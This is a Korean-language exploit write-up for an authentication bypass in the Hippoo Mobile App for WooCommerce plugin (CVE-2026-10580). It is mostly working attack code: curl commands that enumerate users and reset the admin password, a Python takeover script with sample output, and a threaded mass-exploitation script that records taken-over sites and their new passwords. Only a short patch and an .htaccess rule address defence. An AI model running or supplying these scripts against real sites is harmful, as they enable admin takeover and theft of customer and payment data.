
WooCommerce용 Hippoo 모바일 앱 <= 1.9.4 - 인증되지 않은 인증 우회를 통한 관리자 계정 탈취
인증되지 않은 사용자 → 논리적 오류를 통한 관리자 계정 탈취
| CVE | CVE-2026-10580 |
| 플러그인 | Hippoo Mobile App for WooCommerce |
| 버전 | ≤ 1.9.4 |
| CVSS | 9.8 (심각) |
| 인증 필요 | ❌ 아니오 |
| 관리자 탈취 | ✅ 예 |
| WooCommerce 데이터 | ✅ 전체 액세스 |
get_user_permissions() 함수는 관리자의 경우 null을 반환하고(올바름) 인증되지 않은 사용자의 경우에도 null을 반환합니다(잘못됨).
has_role_access()는 null을 확인하고 → 전체 액세스 권한을 부여합니다.
결과:
/wp-json/wc-hippoo/v1/ext/*
→ 로그인, 쿠키, nonce 없이 접근 가능
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wp/v2/users?per_page=10" | jq .
curl -X POST "https://target.com/wp-json/wc-hippoo/v1/ext/wp/v2/users/1" \
-H "Content-Type: application/json" \
-d '{"password":"Pwned123!"}'
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wc/v3/orders?per_page=50"
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wc/v3/customers?per_page=50"
#!/usr/bin/env python3
import requests
import sys
import json
def exploit(target, admin_id=1, new_password="PwnedCVE2026!!"):
base = target.rstrip('/')
# Step 1 - Enumeration
users_url = f"{base}/wp-json/wc-hippoo/v1/ext/wp/v2/users"
r = requests.get(users_url)
if r.status_code != 200:
print(f"[-] Not vulnerable: {target}")
return False
users = r.json()
print(f"[+] Found {len(users)} user(s)")
# Step 2 - Password reset
takeover_url = f"{base}/wp-json/wc-hippoo/v1/ext/wp/v2/users/{admin_id}"
r2 = requests.post(takeover_url, json={"password": new_password})
if r2.status_code == 200:
print(f"[✓] ADMIN TAKEOVER: {target}")
print(f" Login: {base}/wp-admin")
print(f" Password: {new_password}")
return True
else:
print(f"[-] Failed: {target}")
return False
if __name__ == "__main__":
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} https://target.com")
sys.exit(1)
exploit(sys.argv[1])
python3 exploit.py https://poloss.ddev.site
출력:
[+] Found 1 user(s)
[✓] ADMIN TAKEOVER: https://poloss.ddev.site
Login: https://poloss.ddev.site/wp-admin
Password: PwnedCVE2026!!
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed
def takeover(target):
try:
r = requests.post(
f"{target.rstrip('/')}/wp-json/wc-hippoo/v1/ext/wp/v2/users/1",
json={"password": "MassPwned2026!!"},
timeout=10
)
if r.status_code == 200:
print(f"[✓] TAKEOVER: {target}")
with open("pwned.txt", "a") as f:
f.write(f"{target} | admin | MassPwned2026!!\n")
except:
pass
with open("targets.txt") as f:
urls = [line.strip() for line in f if line.strip()]
with ThreadPoolExecutor(max_workers=20) as executor:
for url in urls:
executor.submit(takeover, url)
if (empty($user) || !$user->exists()) {
return false; // BUKAN NULL
}
if ($perms === false) {
return false; // Unauthenticated denied
}
RewriteCond %{REQUEST_URI} ^/wp-json/wc-hippoo/v1/ext/
RewriteCond %{HTTP_COOKIE} !wordpress_logged_in
RewriteRule .* - [F,L]
CVE-2026-10580 • 100% POC • 인증 불필요 • 전체 관리자 탈취
#WordPress #WooCommerce #Poloss #W.P.E.F
| 엔드포인트 | 데이터 |
|---|
/wp-json/wc-hippoo/v1/ext/wp/v2/users | 모든 WP 사용자 |
/wp-json/wc-hippoo/v1/ext/wp/v2/users/1 | 관리자 탈취 |
/wp-json/wc-hippoo/v1/ext/wc/v3/orders | 전체 주문 |
/wp-json/wc-hippoo/v1/ext/wc/v3/products | 제품 + 재고 |
/wp-json/wc-hippoo/v1/ext/wc/v3/customers | 고객 개인정보 |
/wp-json/wc-hippoo/v1/ext/wc/v3/coupons | 할인 코드 |
/wp-json/wc-hippoo/v1/ext/wc/v3/reports | 매출 보고서 |
/wp-json/wc-hippoo/v1/ext/wc/v3/payment_gateways | 결제 설정 |
| 벡터 | 값 |
|---|
| AV | 네트워크 |
| AC | 낮음 |
| PR | 없음 |
| UI | 없음 |
| S | 변경되지 않음 |
| C | 높음 |
| I | 높음 |
| A | 높음 |